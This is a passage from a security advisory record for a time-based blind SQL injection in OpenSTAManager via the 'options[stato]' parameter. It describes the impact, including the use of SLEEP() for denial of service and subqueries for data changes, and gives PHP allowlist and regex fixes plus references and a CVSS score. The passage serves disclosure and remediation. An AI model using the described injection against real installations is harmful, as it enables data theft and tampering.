(PII), financial records (invoices, quotes, contracts, payments), and application configuration.\n- **Integrity:** With MySQL\u0027s `INSERT`/`UPDATE` capabilities via subqueries, an attacker may be able to modify data.\n- **Availability:** An attacker can execute `SLEEP()` with large values or resource-intensive queries to cause denial of service.\n\n## Proposed Remediation\n\n### Option A: Allowlist Validation (Recommended)\n\nReplace the direct concatenation with an allowlist of permitted column names:\n\n```php\n// modules/preventivi/ajax/select.php \u2014 FIXED\n$allowed_stati = [\u0027is_pianificabile\u0027, \u0027is_completato\u0027, \u0027is_fatturabile\u0027, \u0027is_concluso\u0027];\n$stato = !empty($superselect[\u0027stato\u0027]) \u0026\u0026 in_array($superselect[\u0027stato\u0027], $allowed_stati)\n ? $superselect[\u0027stato\u0027]\n : \u0027is_pianificabile\u0027;\n$where[] = \u0027(\u0027.$stato.\u0027 = 1)\u0027;\n```\n\n```php\n// modules/ordini/ajax/select.php \u2014 FIXED\n$allowed_stati = [\u0027is_fatturabile\u0027, \u0027is_evadibile\u0027, \u0027is_completato\u0027];\n$stato = !empty($superselect[\u0027stato\u0027]) \u0026\u0026 in_array($superselect[\u0027stato\u0027], $allowed_stati)\n ? $superselect[\u0027stato\u0027]\n : \u0027is_fatturabile\u0027;\n$where[] = \u0027`or_statiordine`.\u0027.$stato.\u0027 = 1\u0027;\n```\n\n```php\n// modules/contratti/ajax/select.php \u2014 FIXED\n$allowed_stati = [\u0027is_pianificabile\u0027, \u0027is_completato\u0027, \u0027is_fatturabile\u0027];\n$stato = !empty($superselect[\u0027stato\u0027]) \u0026\u0026 in_array($superselect[\u0027stato\u0027], $allowed_stati)\n ? $superselect[\u0027stato\u0027]\n : \u0027is_pianificabile\u0027;\n$where[] = \u0027`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE \u0027.$stato.\u0027 = 1)\u0027;\n```\n\nThis approach is recommended because the `stato` parameter represents a database column name (not a value), so prepared statements cannot be used here. The allowlist ensures only known-safe column names are accepted.\n\n### Option B: Regex Validation (Alternative)\n\nIf the set of column names is dynamic, validate the format strictly:\n\n```php\n$stato = !empty($superselect[\u0027stato\u0027]) ? $superselect[\u0027stato\u0027] : \u0027is_pianificabile\u0027;\nif (!preg_match(\u0027/^[a-z_]+$/i\u0027, $stato)) {\n $stato = \u0027is_pianificabile\u0027; // fallback to safe default\n}\n$where[] = \u0027(\u0027.$stato.\u0027 = 1)\u0027;\n```\n\nThis ensures only alphabetic characters and underscores are accepted, preventing any SQL injection.\n\n### Option C: Backtick Quoting (Supplementary)\n\nIn addition to validation, wrap the column name in backticks to treat it as an identifier:\n\n```php\n$where[] = \u0027(`\u0027.str_replace(\u0027`\u0027, \u0027\u0027, $stato).\u0027` = 1)\u0027;\n```\n\n**Note:** This alone is insufficient without input validation but provides defense-in-depth.\n\n### Global Recommendation\n\nAudit all usages of `$superselect` across the codebase. Any value from `$superselect` that is used as part of a SQL expression (not as a parameterized value) must be validated against an allowlist. The `prepare()` function is already used correctly in other parts of the code \u2014 the issue is specifically where `$superselect` values are used as column names or bare expressions.\n\n### Credits\nOmar Ramirez",
"id": "GHSA-3gw8-3mg3-jmpc",
"modified": "2026-04-06T17:17:50Z",
"published": "2026-04-01T19:46:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28805"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenSTAManager has a Time-Based Blind SQL Injection via `options[stato]` Parameter"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…